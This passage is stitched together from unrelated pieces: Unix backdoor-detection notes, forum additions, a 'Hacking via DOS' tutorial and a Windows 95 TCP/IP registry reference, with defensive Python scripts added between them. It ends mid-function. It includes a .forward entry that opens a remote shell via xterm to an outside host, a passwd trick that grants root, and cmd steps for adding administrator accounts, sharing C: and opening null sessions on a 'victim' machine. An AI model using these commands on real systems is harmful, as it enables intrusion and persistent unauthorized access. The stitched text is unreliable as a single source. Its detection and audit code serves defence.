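        save_baseline(clean, os.path.join(store, "baseline.json"))

        # Simulated intrusion: login is replaced, a renamed sniffer appears.
        with open(os.path.join(bindir, "login"), "wb") as f:
            f.write(b"trojan login with backdoor password (constructed sample)\n")
        with open(os.path.join(bindir, "in.syslog"), "wb") as f:
            f.write(b"renamed sniffer (constructed sample)\n")

        stored = load_baseline(os.path.join(store, "baseline.json"))
        return compare_baseline(stored, build_baseline(root))


if __name__ == "__main__":
    print(demo())
```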


Intrusion detection

Intrusion detection is becoming more important as organizations are hooking up and allowing connections to some of their machines. Most of the older intrusion detection technology was based on log events. The latest intrusion detection system (IDS) technology is based on real-time sniffing and network traffic security analysis. Many of the network traffic backdoors can now easily be detected. The latest IDS technology can take a look at the DNS UDP packets and determine whether they match the DNS protocol. If the data on the DNS port does not match the DNS protocol, an alert flag can be signaled and the data captured for further analysis. The same principle can be applied to the data in an ICMP packet to see if it is the normal ping data or if it is carrying an encrypted shell session.
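The DNS-port check the paragraph describes, as an added example that is not part of the original text: it parses the header and question section of a UDP/53 payload and rejects anything that does not have the shape of a DNS message, which is what a UDP shell backdoor parked on port 53 looks like. The sample packets are constructed.

```python
"""Check whether a UDP payload seen on port 53 actually looks like DNS.

Added example, not part of the original document. It assumes the traffic
has already been captured and the UDP payload bytes are available; the
sample packets below are constructed by me.
"""
import struct


def _parse_name(payload, offset, depth=0):
    """Walk a DNS name at `offset`; return the offset just past it.

    Raises ValueError on malformed labels, bad pointers or over-long names.
    """
    if depth > 8:
        raise ValueError("too many compression pointers")
    total = 0
    while True:
        if offset >= len(payload):
            raise ValueError("name runs past end of message")
        length = payload[offset]
        if length == 0:
            return offset + 1
        if length & 0xC0 == 0xC0:          # compression pointer (RFC 1035 4.1.4)
            if offset + 1 >= len(payload):
                raise ValueError("truncated pointer")
            target = struct.unpack("!H", payload[offset:offset + 2])[0] & 0x3FFF
            if target >= offset:           # pointers may only go backwards
                raise ValueError("forward or self-referencing pointer")
            _parse_name(payload, target, depth + 1)
            return offset + 2
        if length > 63:                    # also rejects the reserved 0x40/0x80 prefixes
            raise ValueError("label longer than 63 octets")
        label = payload[offset + 1:offset + 1 + length]
        if len(label) != length:
            raise ValueError("truncated label")
        total += length + 1
        if total > 255:
            raise ValueError("name longer than 255 octets")
        offset += 1 + length


def looks_like_dns(payload):
    """Return (ok, reason); ok is True when the header and question section parse.

    This is a protocol-shape check only: a backdoor that wraps its data in
    well-formed DNS still passes, which is why the text also has the IDS
    capture the data for further analysis.
    """
    if len(payload) < 12:
        return False, "shorter than the 12-byte DNS header"
    _id, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", payload[:12])
    opcode = (flags >> 11) & 0xF
    if opcode not in (0, 1, 2, 4, 5):      # QUERY, IQUERY, STATUS, NOTIFY, UPDATE
        return False, "unassigned opcode %d" % opcode
    if flags & 0x0040:                     # the Z bit must be zero
        return False, "reserved Z bit set"
    if qdcount == 0 and (flags & 0x8000) == 0:
        return False, "query with no question"
    if qdcount > 16:
        return False, "implausible QDCOUNT %d" % qdcount
    offset = 12
    try:
        for _ in range(qdcount):
            offset = _parse_name(payload, offset)
            if offset + 4 > len(payload):
                return False, "truncated question"
            _qtype, qclass = struct.unpack("!HH", payload[offset:offset + 4])
            if qclass not in (1, 3, 4, 254, 255):   # IN, CH, HS, NONE, ANY
                return False, "unknown QCLASS %d" % qclass
            offset += 4
    except ValueError as exc:
        return False, str(exc)
    return True, "header and %d question(s) parse" % qdcount


def build_query(name, qtype=1, txid=0x1234):
    """Constructed standard query for `name`, used as the benign sample."""
    labels = b"".join(bytes([len(p)]) + p.encode() for p in name.strip(".").split("."))
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)    # RD set, one question
    return header + labels + b"\x00" + struct.pack("!HH", qtype, 1)


# Constructed samples: a normal A query, and a command string sent over UDP/53.
GOOD_QUERY = build_query("www.example.com")
SHELL_PAYLOAD = b"BACKDOOR: uname -a\n"

if __name__ == "__main__":
    for pkt in (GOOD_QUERY, SHELL_PAYLOAD):
        print(looks_like_dns(pkt))
```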


Boot from CD-ROM

Some administrators may want to consider booting from CD-ROM, thus eliminating the possibility of an intruder installing a backdoor on the CD-ROM. The problem with this method is the cost and time of implementing this solution enterprise wide.


Vigilant

Because the security field is changing so fast, with new vulnerabilities being announced daily and intruders constantly designing new attack and backdoor techniques, no security technology is effective without vigilance.

Be aware that no defense is foolproof, and that there is no substitute for diligent attention.


-------------------------------------------------------------------------


you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also a common method of regaining access. For the account ``username'' a .forward file might be constructed as follows:

\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

Permutations of this method include alteration of the system's mail aliases file (most commonly located at /etc/aliases). Note that this is a simple permutation; the more advanced can run a simple script from the forward file that can take arbitrary commands via stdin (after minor preprocessing).

PS: The above method is also useful for gaining access to a company's mailhub (assuming there is a shared home directory FS on the client and server).


> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).


---------------------------------------------------------------------------


you may want to add this "feature" that can act as a backdoor:

when specifying a wrong uid/gid in the /etc/password file, most login(1) implementations will fail to detect the wrong uid/gid and atoi(3) will set uid/gid to 0, giving superuser privileges.

example:
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
on Linux boxes, this will give uid 0 to user rmartin.
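An added audit script (mine, not from either of the two posts above) for the two account-level backdoors they describe: it emulates atoi(3) on passwd uid/gid fields so an entry like the rmartin line is flagged before login(1) ever sees it, and it lists pipe-to-program destinations in .forward and aliases files, the case smrsh is meant to restrict. The sample inputs are constructed; the handle-ticket path is a placeholder.

```python
"""Audit passwd entries and mail-forwarding files for the backdoors above.

Added example, not code from the original posts. atoi() mimics C atoi(3):
leading digits only, parsing stops at the first other character, and no
digits at all yields 0. Sample lines are constructed.
"""
import re


def atoi(field):
    """Mimic atoi(3): optional whitespace and sign, then leading digits; else 0."""
    m = re.match(r"\s*([+-]?\d+)", field)
    return int(m.group(1)) if m else 0


def audit_passwd(text):
    """Return (username, reason) pairs for suspicious passwd lines."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry (%d fields)" % len(fields)))
            continue
        user, _pw, uid, gid, _gecos, _home, _shell = fields
        for name, value in (("uid", uid), ("gid", gid)):
            if not value.isdigit():
                findings.append((user, "%s field %r is not numeric; atoi() yields %d"
                                 % (name, value, atoi(value))))
        if atoi(uid) == 0 and user != "root":
            findings.append((user, "uid 0 account other than root"))
    return findings


# A destination that starts with '|' (optionally quoted) runs a program.
PIPE_RE = re.compile(r'^\s*"?\|')


def audit_forward(text, source):
    """Flag destinations that pipe mail into a program.

    source is "forward" for ~/.forward (one destination per line) or
    "aliases" for /etc/aliases (name: dest, dest, ...).
    """
    findings = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if source == "aliases":
            if ":" not in stripped:
                continue
            name, dests = stripped.split(":", 1)
            targets = [d.strip() for d in dests.split(",")]
        else:
            name, targets = "~/.forward", [stripped]
        for target in targets:
            if PIPE_RE.match(target):
                findings.append((name.strip(), target))
    return findings


# Constructed samples echoing the two posts above.
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/sh
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
"""
FORWARD_SAMPLE = r'''\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
'''
ALIASES_SAMPLE = """postmaster: root
nobody: /dev/null
support: alice, "|/usr/local/bin/handle-ticket"
"""

if __name__ == "__main__":
    print(audit_passwd(PASSWD_SAMPLE))
    print(audit_forward(FORWARD_SAMPLE, "forward"))
    print(audit_forward(ALIASES_SAMPLE, "aliases"))
```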

Some useful commands in cmd:

First thing you need to know is some very helpful commands to use on CMD (Command Prompt).

In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, of course... you know the drill).


In case you don't know some of them, then just type the command on CMD and hit enter. A little help will show up in your screen. Read it and understand what the command does.

Lets start easy...

1) ping : This command will allow you to know if the host you are pinging is alive, which means if it is up at the time of executing the "ping" command.

ping x.x.x.x (x is the IP address)

or

ping www.whatever.com (www.whatever.com is the website you want to ping, but you don't know the IP)

OBS: Keep in mind that if the host you are pinging is blocking ICMP packets, then the result will be host down.

2) nslookup : This command has many functionalities.
One is for resolving DNS into IP.
Let's say you know the website URL but you don't know its IP (and you want to find out).

nslookup
www.whatever.com
(www.whatever.com is the website you want to find out the IP of)

Now, another really nice function of nslookup is to find out the IP of specific Mail Servers.

nslookup (enter)
set type=mx (enter)
yahoo.com

This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn't it?

OK, now why would you want to have an IP of a mail server?
To send spoofed mail to your friends or even for SE.

3) tracert : This command will give you the hops that a packet will travel to reach its final destination.

OBS: This command is good to know the route a packet takes before it goes to the target box.

tracert x.x.x.x (x is the IP address)

or

tracert www.whatever.com (www.whatever.com is the website whose IP you don't know)

arp
This command will show you the ARP table. This is good to know if someone is doing ARP poisoning in your LAN.

arp -a

route
This command will show you the routing table, gateway, interface and metric.

route print

ipconfig
This command will show tons of very helpful things: your IP, gateway, and DNS in use.

ipconfig

netstat
This command will show you connections to your box.

netstat

or

netstat -a (this will show you all the listening ports and connections with DNS names)
netstat -n (this will show you all the open connections with IP addresses)
netstat -an (this combines both of the above)

nbtstat
This command will show you the NetBIOS name of the target box.

nbtstat -A x.x.x.x (x is the IP address)

nbtstat -a computername


net view x.x.x.x or computername (will list the available shared folders on the target box)


Now some hints:

net use \\ipaddress\ipc$ "" /user:administrator
(this command will allow you to connect to the target box as administrator)

Now if you want to connect to the target box and browse the entire C drive, then use this command:

net use K: \\computername\C$ (this will create a virtual drive in your "My Computer" folder)

And last but not least, the "help" command.

whatevercommand /help

or

whatevercommand /?
Hacking via DOS:

Try the following DOS commands and use them for hacking


1) ping command
a cool way to say hello to the victim
try
ping [victim's ip goes here]
if the result is "request timed out" then the user is offline
if the result is "reply from [ip] bytes=32 time<1ms TTL 64"
the victim is online.

2) net user [anyname] /add
it adds a new user; put any name in place of [anyname]

3) net localgroup administrators [anyname] /add
This is the command that makes your user a member of the administrators
group.
Depending on the Windows version the name will be different.
If you got an American version the name for the group is Administrators
and for the Portuguese version it is administradores, so it's nice
to know which version of Windows XP you are going to try to share.

4) net share system=C:\ /unlimited
This command shares the C: drive with the name "system".
You can use any root dir instead.

5) net use \\victimip [nameofnetaccount]
This command will make a session between you and the victim.
Of course where it says victimip you will insert the victim's ip,
and nameofnetaccount is the name via which the victim logs on.

6) explorer \\victimip\system
And this will open an Explorer window on the share "system", which is
the C: drive with administrator access!

SAUV: This works only for the local PC's account and it fails on the password if you are using a LAN.

=====================================================================================

Getting IP data from various sources:
Introduction
Getting the local machine's name
RAS machines using some sort of dialup
Network machines
Using the DHCP VxD to get the IP address and the DNS server data
Using WsControl() to get the IP address
Author
Legalese
Copyright


Introduction
------------

This document describes several ways to get TCP/IP specific data under
Windows 95+. Information was provided by George Foot, Jacob Verhoeks,
Arthur Hoogervorst and several whacky programs by Alfons Hoogervorst.

Basic information required to get for TCP/IP:

o The local machine's name

o The local machine's IP address(es)

o The IP addresses of DNS servers

Sample source code (in C) that demonstrates the techniques described in this
document is available on request.

This document refers several times to the Windows registry and to VxDs. If
you want to use the registry and to call VxDs from within DOS programs
(running under Windows), also check out

http://www.hoogervorst.demon.nl.no.spam/proteus/files/regdos.zip (delete
the usual no.spam from the URL).


Getting the local machine's name
--------------------------------

You can get the computer's name by getting the ASCIIZ string from the
following key:

HKEY_LOCAL_MACHINE\
System\
CurrentControlSet\
Control\
ComputerName\
ComputerName\
ComputerName = ASCIIZ string of max. 64 characters.

Several Windows TCP/IP programs use the computer name in host names, for
example Eudora. However, the returned ASCIIZ string doesn't have to be
"DNS compliant", i.e. it may have white space and other characters that
are invalid in host names.

Alternatively, you can find the "real" machine name by getting the current
IP address, and using gethostbyaddr().


RAS machines using some sort of dialup
--------------------------------------

The RAS dialup adapter stores TCP/IP settings in a "phone book entry". For
Windows 95, this phone book is stored in the registry. To get the relevant
addresses, you need to follow these steps:

1. Check if there's a RAS connection active (optional):

Read DWORD value of the following key:

HKEY_LOCAL_MACHINE\
System\
CurrentControlSet\
Services\
RemoteAccess\
Remote Connection = DWORD

If the returned DWORD has value 1, there's a RAS connection


2. Get the name of the current RAS phone book:

Read an ASCIIZ string from the following key:

HKEY_CURRENT_USER\
RemoteAccess\
Default = ASCIIZ string for the active phone book

The returned string should be used in the next step.


3. Get the RAS settings using the "phone book name". Note that you should
first get the size for the settings buffer (using the Registry API).

Read binary data from the following key:

HKEY_CURRENT_USER\
RemoteAccess\
Profile\
"phone book name" = BINARY data of max. 50 bytes

"phone book name" is the name of the phone book retrieved in step 2.


4. The byte at offset 0x04 in the retrieved data buffer has several flags
set for available TCP/IP data.

If bit one (0x01) is set, the user set a fixed IP address for the
current RAS connection. This fixed IP address (in host order) can
be found at offset 0x08.

If bit two (0x02) is set, the user specified one or two DNS addresses.
The DNS addresses are in host order, and can be found at offset 0x0C
and offset 0x10. Note: 0.0.0.0 (0x0UL) is an invalid (unspecified) DNS
address.
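Added example, not from the document: a decoder for the TCP/IP fields of the profile blob described in steps 3 and 4, assuming "host order" means little-endian DWORDs as on x86. The blob is constructed with the inverse helper rather than read from a real registry, so it runs anywhere.

```python
"""Decode the TCP/IP fields of a Windows 95 RAS phone-book profile blob.

Added example, not from the original document. It assumes the layout the
document gives (flags byte at 0x04, fixed IP at 0x08, DNS at 0x0C and 0x10,
DWORDs in host order, taken here as little-endian x86); the blob is
constructed, not read from a registry.
"""
import struct

RAS_FLAG_FIXED_IP = 0x01   # bit one: user set a fixed IP address
RAS_FLAG_DNS = 0x02        # bit two: user specified one or two DNS addresses


def dword_host_order_to_ip(value):
    """Host-order DWORD -> dotted quad (most significant byte is the first octet)."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def parse_ras_profile(blob):
    """Return {'fixed_ip': str or None, 'dns': [str, ...]} from a profile blob.

    Fields past the end of a short blob are treated as absent rather than
    raising, since the document only says "max. 50 bytes".
    """
    result = {"fixed_ip": None, "dns": []}
    if len(blob) < 0x05:
        return result
    flags = blob[0x04]

    def dword_at(offset):
        if len(blob) < offset + 4:
            return None
        return struct.unpack_from("<I", blob, offset)[0]   # host order on x86 = little-endian

    if flags & RAS_FLAG_FIXED_IP:
        value = dword_at(0x08)
        if value is not None:
            result["fixed_ip"] = dword_host_order_to_ip(value)
    if flags & RAS_FLAG_DNS:
        for offset in (0x0C, 0x10):
            value = dword_at(offset)
            if value:                      # 0.0.0.0 means "unspecified" per the document
                result["dns"].append(dword_host_order_to_ip(value))
    return result


def ip_to_host_order(ip):
    """Inverse helper, used only to build the constructed sample."""
    a, b, c, d = (int(x) for x in ip.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d


def constructed_blob(fixed_ip, dns1, dns2):
    """Build a 50-byte blob with both flags set (a constructed sample)."""
    blob = bytearray(50)
    blob[0x04] = RAS_FLAG_FIXED_IP | RAS_FLAG_DNS
    struct.pack_into("<I", blob, 0x08, ip_to_host_order(fixed_ip))
    struct.pack_into("<I", blob, 0x0C, ip_to_host_order(dns1))
    struct.pack_into("<I", blob, 0x10, ip_to_host_order(dns2))
    return bytes(blob)


if __name__ == "__main__":
    sample = constructed_blob("192.0.2.10", "192.0.2.53", "0.0.0.0")
    print(parse_ras_profile(sample))
```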

History:

I had most of the registry functions working (for DOS programs running
under Windows 3.1 and 95), and also found the appropriate RAS connection
key. I didn't find the necessary IP data, and told this to Jacob Verhoeks.
The next day he came up with a full and detailed description of the binary
data stored under the RemoteAccess\Profile tree.


Network machines
----------------

For network machines too the data is stored in the registry. Here are the
steps to retrieve the current IP address and the DNS IP addresses.

1. The current active adapter's IP address can be found in the following key:

HKEY_LOCAL_MACHINE\
System\
CurrentControlSet\
Services\
Class\
NetTrans\
0000\
IPAddress = ASCIIZ string

This ASCIIZ string has the dotted name IP address.

Note: Presumably Windows 95 stores multiple interfaces in the NetTrans
key. Ideally you should enumerate each of them, and check whether any
of them has an "IPAddress" key.

2. The current IP addresses of DNS servers can be found in the following
key:

HKEY_LOCAL_MACHINE\
System\
CurrentControlSet\
Services\
VxD\
MSTCP\
NameServer = ASCIIZ string

This key stores DNS IP addresses in a comma-separated list.


History:

I hadn't worked for a long time on DosSock95 when George Foot referred
me to a .FIX file and sent me the info about the IP address. Both
George Foot and Jacob Verhoeks provided the key which stores the name
server information.


Using the DHCP VxD to get the IP address and the DNS server data
----------------------------------------------------------------

For RAS connections, there's an alternate way to get the IP address and
DNS server addresses. This only works with RAS connections.

First get the entry point of the DHCP VxD (which has ID 0x49A). Call the
entry point with (E)AX set to 1, ES:BX set to a buffer receiving DHCP data,
and (E)CX with the size of the buffer. If the buffer is smaller than the
data available, AX will be set to 111 (Win32 error: ERROR_BUFFER_OVERFLOW)
and the first DWORD in the buffer will contain the size of the DHCP data.

Here's what the information looks like:

Offset  Type   What

0x0000  WORD   Number of IP addresses
0x000C  DWORD  IP addresses in host order
0x0020  WORD   Total number of bytes in server addresses. Divide by four to
               get the number of server addresses.
0x0024  WORD   Offset (from begin of data) to server addresses.

History:

This information was found while stepping through the WinSock code.
Don't try this at home (in a sense: do it actually at home).


Using WsControl() to get the IP address
---------------------------------------

WsControl() is an undocumented function found in both the 16 bit and the
32 bit WinSock DLLs of Microsoft. Many people already suspected that
WsControl() returns very useful data, because it's used by the Windows 95
WINIPCFG tool. The problem is that it's an undocumented function: you won't
hear anything of it from Microsoft... In short: the following information may
be highly platform dependent, and extremely unportable. Food for the hacking
minded proper. Here's what I found out (and I'd appreciate any comments if
you find other things about WsControl).

The WsControl() function looks like this:

DWORD WsControl(DWORD Protocol, DWORD Action,
                LPVOID CommandBuffer, LPDWORD CommandBufferSize,
                LPVOID ResultBuffer, LPDWORD ResultBufferSize);

For TCP/IP Protocol should be set to IPPROTO_TCP and/or IPPROTO_UDP. Other
protocol values result in the expected WSA error "unsupported protocol".

The only value of Action I encountered was 0, which seems to mean something
like "Get Information". I believe that passing a value of 1 would send
something like "Set Information" to WinSock; but I must admit that I didn't
try this. (For obvious reasons, of course. If you happen to have a lot of
money, consider donating money to me, so I can buy a test machine.)

CommandBuffer has a buffer with a command that's sent to WinSock,
CommandBufferSize points to a DWORD with the size of the CommandBuffer.

On return of the function, ResultBuffer will have data returned by WsControl
for the command in CommandBuffer. The DWORD pointed to by ResultBufferSize
should have the size of ResultBuffer on function call, and has the number
of bytes written to ResultBuffer on function return.


CommandBuffer
-------------

The Command buffer is a structure of 36 bytes. It may look like this; names
are mine, yours may be better.


#pragma pack(1)
typedef struct
{
    DWORD Number;    /* Interface number, WS_INTERFACE_TCPIP for TCPIP */
    DWORD Unknown;   /* Seems to be used to differentiate between
                      * multiple TCPIP interfaces. */
} WS_INTERFACE, FAR* LPWS_INTERFACE, NEAR* NPWS_INTERFACE, * PWS_INTERFACE;

typedef struct
{
    WS_INTERFACE Interface;   /* Interfaces to query??? */

    DWORD What;               /* Changes for each request */
    DWORD Unknown;            /* Seems to be always 0x100??? */
    DWORD Command;            /* Obviously a command */

    BYTE Unknown1[16];        /* Unknown (Always 0???) */
} WS_IN_PARAMS, FAR* LPWS_IN_PARAMS, NEAR* NPWS_IN_PARAMS, * PWS_IN_PARAMS;
#pragma pack()

The first two DWORDs in the WS_IN_PARAMS structure (the CommandBuffer) have
a number for what I call an "interface". In Windows 95 lingo you can call
it an adapter. For the TCP/IP interface, the Interface should have a value
of 0x0301, with possibly some other value for the most significant DWORD
(little endian: xxxx xxxx 0000 0301).

Just to clarify the above phrase: when Windows searches for a TCP/IP
interface, it loops while checking for the DWORD 0x00000301.

The What member seems to change for each WsControl request, and probably
"browses" deeper into the hierarchy of data available through WsControl.

The Command member has a number which seems to correspond with a command.


Available Commands
------------------

Here's what I found about commands. Note that the naming of the commands
is mine; yours may be better.


Get List Of Interfaces
----------------------

Interface = 0
What = 0x100
Unknown = 0x100
Command = 0
Unknown1[] = 0

Returns several quad words (4 words, 2 dwords) with all the interfaces
available for use in WsControl.

The interface number for TCP/IP is 0x0301 (with the Unknown dword
possibly set to differentiate between multiple TCP/IP interfaces).

Example output:

0000: 00 04 00 00 00 00 00 00 - 01 04 00 00 00 00 00 00
0010: 01 03 00 00 00 00 00 00 - 80 03 00 00 00 00 00 00
0020: 80 02 00 00 00 00 00 00 - 00 02 00 00 00 00 00 00
0030: 00 02 00 00 01 00 00 00

The quadword at offset 0x10 has the first (and only) TCP/IP interface.
Incidentally, the quadword at 0x30 is related to the loopback adapter,
the quadword at 0x28 to the PPP adapter.


Acknowledge Valid Interface (Get Version??? Is Current???)
----------------------------------------------------------

Interface = Valid Interface
What = 0x100
Unknown = 0x100
Command = 0x1
Unknown1[] = 0

To acknowledge the interface in Interface, send the above command.
The result buffer should return a DWORD with a special value.

For example, the interface number for TCP/IP is 0x0301. If you set
Interface to 0000 0000 0000 0301, the returned DWORD will contain
0x0303. Presumably, the special value returned is related to the
HIBYTE of the interface number.

Note that the ResultBufferSize will NOT have the number of bytes written
to the buffer. This seems to be a bug - or perhaps it's just the way
this command is supposed to work. Your guess may be better.

Example output:

0000: 03 03 00 00

The above output is for the TCP/IP interface.


Get Interface Information
-------------------------

Interface = Valid Interface
What = 0x200
Unknown = 0x100
Command = 0x1
Unknown1[] = 0

This command returns several pieces of data which may or may not be useful at all.

For TCP/IP the DWORD at offset 0x54 has the number of IP addresses
active for the TCP/IP interface. To get specific IP address information,
use the Get Active Address Information.

For TCP/IP the DWORD at offset 0x58 has the number of IP address related
information structures. To get the information, use the Get Extended Active
Address Information.

Example Output:

For TCP/IP:

0000: 02 00 00 00 80 00 00 00 - EA 01 00 00 00 00 00 00
0010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
0020: EA 01 00 00 66 01 00 00 - 00 00 00 00 00 00 00 00
0030: 00 00 00 00 3C 00 00 00 - 00 00 00 00 00 00 00 00
0040: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
0050: 02 00 00 00 02 00 00 00 - 07 00 00 00

The DWORD at offset 0x54 has the number of structures returned by
the Get Active Address Information command. The DWORD at offset
0x58 has the number of structures returned by the Get Extended
Active Address command.


Get Extended Active Address Information
---------------------------------------

Interface = Valid Interface
What = 0x200
Unknown = 0x100
Command = 0x101
Unknown1[] = 0

For TCP/IP this command returns data with an unknown structure. It
seems to list network masks.

Example output:

For TCP/IP see output below. Note that the size of each structure is
0x150 / 0x07.

0000: E0 00 00 00 02 00 00 00 - 01 00 00 00 FF FF FF FF
0010: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
0020: 02 00 00 00 38 00 00 00 - E0 00 00 00 FF FF FF FF
0030: 00 00 00 00 02 00 00 00 - 01 00 00 00 FF FF FF FF
0040: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
0050: 02 00 00 00 38 00 00 00 - 00 00 00 00 FF FF FF FF
0060: C3 AD E4 8E 01 00 00 00 - 01 00 00 00 FF FF FF FF
0070: FF FF FF FF FF FF FF FF - 7F 00 00 01 03 00 00 00
0080: 02 00 00 00 38 00 00 00 - FF FF FF FF FF FF FF FF
0090: C3 AD E4 FF 02 00 00 00 - 01 00 00 00 FF FF FF FF
00A0: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
00B0: 02 00 00 00 38 00 00 00 - FF FF FF FF FF FF FF FF
00C0: C3 AD E4 00 02 00 00 00 - 01 00 00 00 FF FF FF FF
00D0: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
00E0: 02 00 00 00 38 00 00 00 - FF FF FF 00 FF FF FF FF
00F0: FF FF FF FF 02 00 00 00 - 01 00 00 00 FF FF FF FF
0100: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
0110: 02 00 00 00 BB 2B 00 00 - FF FF FF FF FF FF FF FF
0120: 7F 00 00 00 01 00 00 00 - 01 00 00 00 FF FF FF FF
0130: FF FF FF FF FF FF FF FF - 7F 00 00 01 03 00 00 00
0140: 02 00 00 00 BC 2B 00 00 - FF 00 00 00 FF FF FF FF


Get Active Address Information
------------------------------

Interface = Valid Interface
What = 0x200
Unknown = 0x100
Command = 0x102
Unknown1[] = 0

For TCP/IP this command returns data which is only partly understood. The
first DWORD of each structure holds an active IP address, stored in network
byte order (the bytes appear in the same order as in dotted-quad notation).

Example output:

For TCP/IP see the output below. The buffer is 0x30 bytes and holds 2
structures (the count from offset 0x54 of Get Interface Information), so
each structure is 0x30 / 2 = 0x18 bytes.

0000: C3 AD E4 8E 02 00 00 00 - FF FF FF 00 01 00 00 00
0010: FF FF 00 00 01 00 00 C0 - 7F 00 00 01 01 00 00 00
0020: FF 00 00 00 01 00 00 00 - FF FF 00 00 00 00 00 C0

As you can see, the first DWORD has the current IP address
(C3 AD E4 8E = 195.173.228.142). The first DWORD in the second structure has
the loopback address 127.0.0.1, which was active at that time. The DWORD at
offset 8 of each structure (FF FF FF 00 and FF 00 00 00) appears to be the
matching network mask, 255.255.255.0 and 255.0.0.0.
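To make the three layouts above concrete, here is an added example that is not part of the original document: it reads the hex dumps exactly as printed, takes the structure counts from offsets 0x54 and 0x58 of the Get Interface Information output, carves the other two buffers into equal-sized structures with the document's "size / count" rule, and decodes the first DWORD of each as a dotted quad. Reading offset 8 of the Active Address structure as a network mask is an assumption based on the values FF FF FF 00 and FF 00 00 00 in the sample; the document itself does not name that field.

```python
import re
import socket
import struct

# The three TCP/IP dumps from the document above, copied as printed.
INTERFACE_DUMP = """
0000: 02 00 00 00 80 00 00 00 - EA 01 00 00 00 00 00 00
0010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
0020: EA 01 00 00 66 01 00 00 - 00 00 00 00 00 00 00 00
0030: 00 00 00 00 3C 00 00 00 - 00 00 00 00 00 00 00 00
0040: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
0050: 02 00 00 00 02 00 00 00 - 07 00 00 00
"""
ACTIVE_DUMP = """
0000: C3 AD E4 8E 02 00 00 00 - FF FF FF 00 01 00 00 00
0010: FF FF 00 00 01 00 00 C0 - 7F 00 00 01 01 00 00 00
0020: FF 00 00 00 01 00 00 00 - FF FF 00 00 00 00 00 C0
"""
EXTENDED_DUMP = """
0000: E0 00 00 00 02 00 00 00 - 01 00 00 00 FF FF FF FF
0010: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
0020: 02 00 00 00 38 00 00 00 - E0 00 00 00 FF FF FF FF
0030: 00 00 00 00 02 00 00 00 - 01 00 00 00 FF FF FF FF
0040: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
0050: 02 00 00 00 38 00 00 00 - 00 00 00 00 FF FF FF FF
0060: C3 AD E4 8E 01 00 00 00 - 01 00 00 00 FF FF FF FF
0070: FF FF FF FF FF FF FF FF - 7F 00 00 01 03 00 00 00
0080: 02 00 00 00 38 00 00 00 - FF FF FF FF FF FF FF FF
0090: C3 AD E4 FF 02 00 00 00 - 01 00 00 00 FF FF FF FF
00A0: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
00B0: 02 00 00 00 38 00 00 00 - FF FF FF FF FF FF FF FF
00C0: C3 AD E4 00 02 00 00 00 - 01 00 00 00 FF FF FF FF
00D0: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
00E0: 02 00 00 00 38 00 00 00 - FF FF FF 00 FF FF FF FF
00F0: FF FF FF FF 02 00 00 00 - 01 00 00 00 FF FF FF FF
0100: FF FF FF FF FF FF FF FF - C3 AD E4 8E 03 00 00 00
0110: 02 00 00 00 BB 2B 00 00 - FF FF FF FF FF FF FF FF
0120: 7F 00 00 00 01 00 00 00 - 01 00 00 00 FF FF FF FF
0130: FF FF FF FF FF FF FF FF - 7F 00 00 01 03 00 00 00
0140: 02 00 00 00 BC 2B 00 00 - FF 00 00 00 FF FF FF FF
"""

_DUMP_LINE = re.compile(r"^\s*([0-9A-Fa-f]{4}):\s*(.*)$")

def parse_dump(text):
    """Convert 'OFFSET: XX XX ... - XX XX' lines to bytes, checking offsets are contiguous."""
    out = bytearray()
    for line in text.splitlines():
        m = _DUMP_LINE.match(line)
        if not m:
            continue
        offset = int(m.group(1), 16)
        if offset != len(out):
            raise ValueError("offset %#06x, expected %#06x" % (offset, len(out)))
        out.extend(int(tok, 16) for tok in m.group(2).replace("-", " ").split())
    return bytes(out)

def interface_counts(dump):
    """DWORDs at 0x54 and 0x58 of Get Interface Information (little-endian, as on x86)."""
    return struct.unpack_from("<II", parse_dump(dump), 0x54)

def split_structs(buf, count):
    """Split the buffer into `count` equal parts: the document's 'size / count' rule."""
    if count <= 0 or len(buf) % count:
        raise ValueError("%d bytes do not divide into %d structures" % (len(buf), count))
    size = len(buf) // count
    return [buf[i:i + size] for i in range(0, len(buf), size)]

def dword_as_ip(chunk, offset=0):
    """An IPv4 address stored in network byte order: C3 AD E4 8E -> 195.173.228.142."""
    return socket.inet_ntoa(chunk[offset:offset + 4])

def active_addresses(dump, count):
    """(address, mask) per structure; the mask at offset 8 is an assumption from the sample."""
    return [(dword_as_ip(s, 0), dword_as_ip(s, 8)) for s in split_structs(parse_dump(dump), count)]

def extended_destinations(dump, count):
    """First DWORD of each Extended Active Address structure, decoded as an address."""
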